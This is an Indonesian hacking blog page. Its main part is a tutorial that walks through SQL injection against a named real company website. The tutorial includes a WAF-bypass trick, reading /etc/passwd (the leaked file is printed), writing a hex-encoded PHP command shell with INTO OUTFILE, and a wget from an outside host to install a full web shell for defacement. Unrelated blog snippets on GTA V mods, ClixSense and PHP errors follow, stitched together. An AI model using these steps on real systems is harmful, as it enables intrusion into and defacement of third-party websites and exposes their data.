Hy Sobat ^_^ Udah lama nih ga nge-post di blog ini xixixix :v lagi sibuk soalnya :v ada tugas ini ada tugas itu :v belum lagi kalo ada pembeli yang cerewet :v walaahh walau sama" online, jadi penjual hosting emank harus extra ngelayanin pelanggan :v .
Berhubung Kemaren ada temen yang rewel banget minta dibuatin Tutorial ini maka disini ane akan menunjukkan bagaimana cara mengunggah shell pada suatu webiste dengan SQL Injection tanpa harus menjadi admin, langsung saja berikut ini adalah langkah - langkahnya :
1) Kita cari target yang vuln SQLi dulu, di sini saya sudah mendapatkan 1 target yaitu http://www.vaksindo.co.id/ test target dengan menambahkan tanda ' pada parameter SQL nya.
3) sekarang kita lakukan order by untuk menemukan jumlah table.
http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+1--+&lang=id&p=produk-kami
http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+2--+&lang=id&p=produk-kami
http://www.vaksindo.co.id/vaksindo/views.php?page=1&id=1%27+order+by+3--+&lang=id&p=produk-kami
lakukan hingga error ( Tulisan Hilang ) Kembali
5) Owh.. ternyata Aksi kita di blok oleh server, kita bisa membypass nya dengan mengganti union menjadi /*!12345union*/
6) yaaappss udh ga di blok :D tapi mana? nomer tablenya kok ga muncul? o.O
hhaha jangan kuatir, untuk memunculkannya tambahkan +and+0 di belakang ID parameter.
7) nah tuh kita udh dapet nomer nya yaitu 3 , nomer ini lah yang nanti kita gunakan untuk mengeksekusi perintah" SQLi, sekarang kita cek dulu file_priv nya untuk mengetahui apakah kita bisa mengupload shell atau tidak menggunakan SQLi. Ganti angka 3 tadi dengan file_priv dan tambahkan +from+mysql.user sebelum tanda --+
8) yaak kita mendapatkan jawaban Y yang berarti kita bisa mengupload shell melalui SQL Injection :D selanjutnya kita mencoba untuk me-load file /etc/passwd yang ada di server dengan perintah load_file('/etc/passwd') > Letakkan pada angka 3 tadi dan jangan lupa hapus
string "+from+mysql.user" terlebih dahulu
kita dapat :9) di file ini kita bisa mencari folder" yang sekiranya bisa kita jadikan tempat memasang shell kita. di sini saya menemukan /var/www/html/vaksindo sebagai folder tempat penyimpanan file" website ini, langkah ini lah yang paling sulit ketika SQLi Into Out File.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin pulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:493:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin admin:x:500:500:administrator:/home/admin:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ayu:x:502:503::/home/ayu:/bin/bash vaksindo:x:504:505::/var/www/html/vaksindo:/sbin/nologin japfa4kids:x:505:506::/var/www/html/japfa4kids:/sbin/nologin Administrator:x:506:507::/var/www/html/:/sbin/nologin admincorporate:x:507:508::/var/www/html/corporate/:/bin/bash admincatalog:x:508:509::/var/www/html/ecatalog/:/bin/bash
10) Langkah selanjutnya yakni memasang shell command sederhana yang berisi <?include($_GET["cmd']);?> namun harus diconvert dahulu menjadi bentuk hex 0x3c3f7068702073797374656d28245f4745545b636d645d293b3f3e
tambahkan hex tersebut pada angka 3 tadi dan tmbahkan string ini sebelum --+
+INTO+OUTFILE+'directory_web_yang_writable/namashellente.php
contoh :
+INTO+OUTFILE+'/var/www/html/vaksindo/foto_berita/pescyte.php'
11) Sekarang kita buka shell kita.
12) loh kok shellnya cuman angka gitu? o.O hhehee santai, namanya juga shell sederhana, jadi fungsinya di umpetin :v cara memasang shellnya yaitu tambahkan perintah berikut setelah meong.php:
?cmd=wget alamatshell.txt
contoh : ?cmd=wget http://ppsd-files.pe.hu/v2.txt
13) lalu dilanjutkan dengan perintah :
?cmd=mv v2.txt anon.php
14) Langkah terakhir, kita buka shell kita yang asli.
Binggoooo :D kita sudah berhasil mengupload shell kita :D dan terserah mau apain tuh website :v kalo mau Deface, Ane titip nick aja deh :v => Anonymous Indonesia, Sekian Terima Kasih ^_^
NB : KALAU MAU COPAS SERTAKAN SUMBER BROOOO!!!
Oke gan kalau kemarin saya sudah membahas Tutorial deface dengan SQLI manual, Kali ini saya akan membagikan Tutorial SQLI dengan DIOS ( Dump In One Shot )
Kalau Di artikel kemarin kita habis union select kita mesti masukan group_concat dan seterusnya untuk mengetahui column, table, kali ini gak perlu repot-repot lagi, nanti bakal keluar semua column beserta table nya,
Yang Belum membaca tutorial
WAF (Web application firewall) pada umumnya adalah merupakah firewall yang berjalan pada layer aplikasi yang memonitor dan memodifikasi http request. Pada dasarnya WAFs melindungi dari berbagai macam Https attacks dan queries seperti SQLI dan XSS.
Karena firewall mampu mendeteksi HTTP Methods, SQL Queries dan script lain sebagai suatu input ke suatu website maka firewall bisa berfungsi pula
Kehadiran Grand Theft Auto V di PC memang menjadi daya tarik tersendiri bagi para modder. Berbagai mod yang memberikan konten berbeda-beda mulai banyak dikembangkan. Tak sedikit pula yang justru membuat game garapan Rockstar ini lebih menarik.
Ada mod yang membuka bangunan atau gedung yang sebelumnya terkunci, ataiupun mod yang membuat semua kota di GTA V tenggelam ala Water-World. Selain itu, ada pula modder yang memfokuskan karyanya untuk meningkatkan kualitas visual.
Contohnya adalah mod buatan seorang user Reddit dengan username Toddyftw. Menurutnya, saat ini ia sedang sibuk menggarap mod yang mampu meningkatkan kualitas visual dari GTA V sebagus mungkin. Targetnya adalah menjadikan game ini terlihat seperti di dunia nyata sesungguhnya!
Toddyftw belum bisa memastikan kapan mod garapannya selesai. Meski begitu, ia sudah memliki beberapa screenshot hasil kerja kerasnya yang sangat menawan. Bahkan, beberapa diantaranya terlihat seperti foto asli, bukan diambil dari video game.
Enam screenshot yang dirilis oleh Toddyftw membuktikan mod-nya punya potensi yang sangat menjanjikan. Walaupun ada pula user di Reddit yang komplain karena screenshot yang diunggah sang modder nampak gelap. Bagaimana menurut Anda?
ClixSense adalah metode industri terbukti yang memungkinkan penayang situs web setiap ukuran atau anggaran untuk mengarahkan sasaran dan lalu lintas yang unik ke situs Web mereka. Ini adalah sistem yang sama bahwa pengecer online terbesar di dunia memanfaatkan untuk kebutuhan iklan mereka.
ClixSense menawarkan kesempatan ini untuk setiap pedagang web apakah Anda seorang memulai bisnis dengan anggaran iklan minimal atau jika bisnis Anda sudah mapan tetapi Anda menginginkan eksposur web tambahan.
ya, kurang lebih seperti itu, cara mendapatkan uang dari clixsense seperti berikut;
1. buka link Clixsense, kemudian isi data formulir pendaftaran dan klik Signup now
Hallo para blogger, saya yakin ini sering kalian alami kan, hehee, iya kan, saat cari template yang cocok buat blog kalian, tapi kalian maunya yang free dan gak ada embel-embel credit di footer nya, Pernah mau menghapus tapi malah keredirect ke blog pembuatnya,
Sebenarnya tempate itu masih ada javascript yang di encrypt, biar credit nya gak bisa di hapus, ya mau gak mau kalau pengen
Pagi kan, pagi ini saya iseng-iseng belajar koding, sambil nyoba xampp yang baru saya perbarui, tapi setelah saya perbarui ternyata script saya yang awalnya gak ada error malah jadi error,
Notice: Undefined index: error in C:\xampp\htdocs\account\index.php on line 52
Sambil curhat ya gan hehehe, sempat bingung sih, ternyata masalahnya cuma beda versi php nya, yang awalnya pakai PHP 4.x setelah
Idiot Attacker - WordPress menggunakan platform conten management system atau CMS. CMS
merupakan sistem operasi untuk menangani website secara dinamis agar
mudah dalam pengelolaannya. Karena itulah platform wordpress paling
banyak digunakan untuk melakukan manajemen website.
saya dulu juga pengguna cms ini, jujur saya juga suka sama cms ini, terutama sama plugin-plugin nya, banyak
Udah tahun 2016 nih, maaf blog idiot attacker baru bisa update artikel, karena admin lagi ada tuntutan kerja jadi gak bisa aktif ngeblog,
Bingung mau buat artikel apa, yaudah idiot attacker buat artikel Cara membuat kode copyright blog otomatis berubah setiap tahun,
Sesuai temanya pergantian tahun, yang copyright blog nya di tulis manual saat pergantian tahun pasti kalian menggantinya dgn































